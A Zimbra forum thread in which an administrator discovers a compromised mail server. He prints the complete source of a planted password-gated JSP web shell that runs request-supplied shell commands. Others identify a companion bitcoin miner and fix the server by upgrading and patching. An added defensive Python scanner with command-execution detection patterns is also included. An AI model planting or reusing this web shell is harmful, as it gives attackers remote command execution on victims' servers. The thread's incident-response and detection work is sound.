zimbra not listen in 443 port

Posted: Sat Apr 13, 2019 8:59 am
by seryoga_p
Hi, some strange things are going on with my mail server.

[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$


Today Zimbra suddenly stopped working on port 443 with the error

HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:

    /public/error.jsp


nginx is fine:

[zimbra@mail ~]$ lsof -i :443
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nginx   2452 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2453 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2454 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2455 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
[zimbra@mail ~]$

By accident I looked at the folder /opt/zimbra/jetty/webapps/zimbra/public/

[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25  2016 5xx.html
-rw-r----- 1 zimbra zimbra  332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25  2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25  2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25  2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25  2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10  2016 sounds
-rw-rw-r-- 1 zimbra zimbra   33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 tmp

There is a file Ajax.jsp modified yesterday:

[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>


Am I hacked? Is there any way to restore Zimbra functionality?
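
A check a defender can run after a finding like the one above, added here as an example that is not from this thread and not Zimbra's own tooling: walk the webapp directory, flag every .jsp that contains an OS command-execution call, and optionally keep only files modified within the last N days (the Ajax.jsp above stood out by its fresh mtime). The directory, file names and contents below are constructed stand-ins, and the marker files are inert JSP comments, not working code.

```python
import os
import re
import tempfile
import time

# Calls that let a JSP run OS commands; a stock Zimbra JSP has no reason to
# contain them. request.getParameter alone is common in legitimate JSPs, so it
# is only recorded as "parameter-controlled" context, never as a hit by itself.
EXEC_PATTERNS = [r"Runtime\.getRuntime\(\)\.exec\(", r"ProcessBuilder\("]
PARAM_PATTERN = r"request\.getParameter\("


def scan_jsp_dir(root, max_age_days=None):
    """Return one finding per .jsp under root that contains a command-execution
    call; with max_age_days set, only files modified within that many days."""
    cutoff = None if max_age_days is None else time.time() - max_age_days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".jsp"):
                continue
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            if cutoff is not None and mtime < cutoff:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = [p for p in EXEC_PATTERNS if re.search(p, text)]
            if hits:
                findings.append({"name": name, "path": path, "mtime": mtime,
                                 "patterns": hits,
                                 "param_controlled": re.search(PARAM_PATTERN, text) is not None})
    return findings


def build_sample_tree():
    """Constructed stand-in for /opt/zimbra/jetty/webapps/zimbra/public/: one
    recently modified inert marker, one 30-day-old marker, one harmless JSP, one HTML."""
    root = tempfile.mkdtemp(prefix="zimbra_public_")
    samples = {
        "Ajax.jsp": "<%-- constructed, inert: Runtime.getRuntime().exec( request.getParameter( --%>",
        "old.jsp": "<%-- constructed, inert: new ProcessBuilder( --%>",
        "clean.jsp": '<%= request.getParameter("skin") %>',
        "launch.html": "<html>constructed</html>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    old = time.time() - 30 * 86400
    os.utime(os.path.join(root, "old.jsp"), (old, old))  # backdate the old marker
    return root


if __name__ == "__main__":
    for f in scan_jsp_dir(build_sample_tree(), max_age_days=2):
        print(f["path"], f["patterns"], "param-controlled" if f["param_controlled"] else "")
```

Run it against the real webapps tree with a small max_age_days first, then without the age filter, since a backdoor dropped weeks ago will not be recent.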

Re: zimbra not listen in 443 port

Posted: Sat Apr 13, 2019 9:09 am
by phoenix
seryoga_p wrote: Am I hacked? Is there any way to restore Zimbra functionality?
If you want to check then see if this applies to your server: https://forums.zimbra.org/viewtopic.php?f=15&t=65932

Re: zimbra not listen in 443 port

Posted: Sat Apr 13, 2019 10:16 am
by seryoga_p
Fixed:
1. Upgrade to 8.7.11
2. Patch P10
Now everything is working.

Re: zimbra not listen in 443 port

Posted: Thu Apr 18, 2019 7:03 pm
by GlooM
seryoga_p wrote: Fixed:
1. Upgrade to 8.7.11
2. Patch P10
Now everything is working.


Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have the file /opt/zimbra/log/zmswatch?

Re: zimbra not listen in 443 port

Posted: Fri Apr 19, 2019 11:35 am
by seryoga_p
GlooM wrote: Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have the file /opt/zimbra/log/zmswatch?

Hi, GlooM )
Yes, there are files zmswatch and zmswatch.out.
VirusTotal says it's a bitcoin miner.

Re: zimbra not listen in 443 port

Posted: Fri Apr 19, 2019 1:25 pm
by GlooM
seryoga_p wrote: Yes, there are files zmswatch and zmswatch.out.
VirusTotal says it's a bitcoin miner.


As I understand it, the hacking technique is the same.
zmswatch - miner, Ajax.jsp - shell?

The last patch is required to solve the problem. But this is not the same as described here: https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ - there are no zmcat, l.sh and s.sh files, and less trash in /opt/zimbra/jetty/

This is probably a newer hacking technique than the one previously described in CVE-2019-9670.

Re: zimbra not listen in 443 port

Posted: Fri Apr 19, 2019 1:47 pm
by seryoga_p
Scanned with ClamAV:
[root@mail log]# sudo clamscan -i -r /opt/zimbra/log
/opt/zimbra/log/zmswatch: Multios.Coinminer.Miner-6781728-2 FOUND


It would probably be more correct to make backups of Zimbra, reinstall CentOS and make a fresh Zimbra install, then restore the backup, but unfortunately there is no storage space on the rented VPS to recover mail quickly (now ~80GB).
I plan to stay on this VPS to the end of the year and then move to physical hardware with Zimbra or something else.